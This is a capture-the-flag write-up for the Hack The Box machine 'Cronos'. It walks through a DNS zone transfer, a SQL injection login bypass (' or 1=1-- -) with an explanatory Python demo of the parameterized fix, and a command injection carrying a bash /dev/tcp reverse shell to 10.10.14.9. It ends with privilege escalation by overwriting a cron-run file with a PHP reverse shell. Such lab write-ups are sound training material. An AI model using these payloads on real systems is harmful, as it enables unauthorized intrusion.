HTB - Cronos
In Cronos we get exposed to some new and some old! Some DNS enumeration followed by SQLi with a bit of OS command execution will get us on the box. For privesc we abuse a particular cron job.
First, our scan:

22,53,80!
DNS enumeration:
The first step is to resolve the IPs of Cronos using nslookup:

Any time we see DNS running on TCP, we should try for a zone transfer:

Perfect! Let's add these names to our /etc/hosts file:

Next step: visiting cronos.htb

Nothing much going on here, so I’ll pivot over to admin.cronos.htb

After many trivial and useless attempts to crack this, I finally found a SQLi that worked:
' or 1=1-- -
Absolutely brutal, but a reminder to run through the gamut before you call it quits!
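
Why that input gets past the login, shown as an added example that is not the box's actual login code: the table, column names and query shape are assumptions, and SQLite stands in for the application's database. The parameterized function is the fix for the same check.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the login's user table (schema is an assumption;
    # the write-up does not show the real one).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # The password column stands for a stored hash; the value is constructed.
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'constructed-hash')")
    return db

def rendered_query(username, password):
    # The SQL text the database receives when input is concatenated in.
    return ("SELECT id FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_vulnerable(db, username, password):
    # A quote in `username` closes the string literal, so the rest of the
    # input is parsed as SQL instead of being compared as a value.
    return db.execute(rendered_query(username, password)).fetchone() is not None

def login_parameterized(db, username, password):
    # Placeholders keep the statement fixed; the driver passes the values
    # separately, so they can only ever be compared as data.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1-- -"  # the input from the write-up
    # The trailing "-- -" turns the password check into a comment, leaving
    # "WHERE username = '' or 1=1", which matches every row.
    print(rendered_query(payload, "x"))
    print("concatenated query accepts it: ", login_vulnerable(db, payload, "x"))
    print("parameterized query accepts it:", login_parameterized(db, payload, "x"))
    print("parameterized, real credentials:",
          login_parameterized(db, "admin", "constructed-hash"))
```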

Now, depending on what is happening here, I think we can issue some OS commands by chaining commands and, if we can, get a reverse shell!
Even easier than that, I realized I could intercept the request and place my own command!
command=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/443+0>%261'%26&host=8.8.8.8
and we got a shell!

Grab the user flag and your PrivEsc tool, I used LinEnum.sh here.
It leads us to a cron job and I notice I have write permissions to the file that’s being run.

I went into my PHP reverse shell toolkit and grabbed my reverse shell. I copied it onto artisan and waited:

Grab the flag and all set!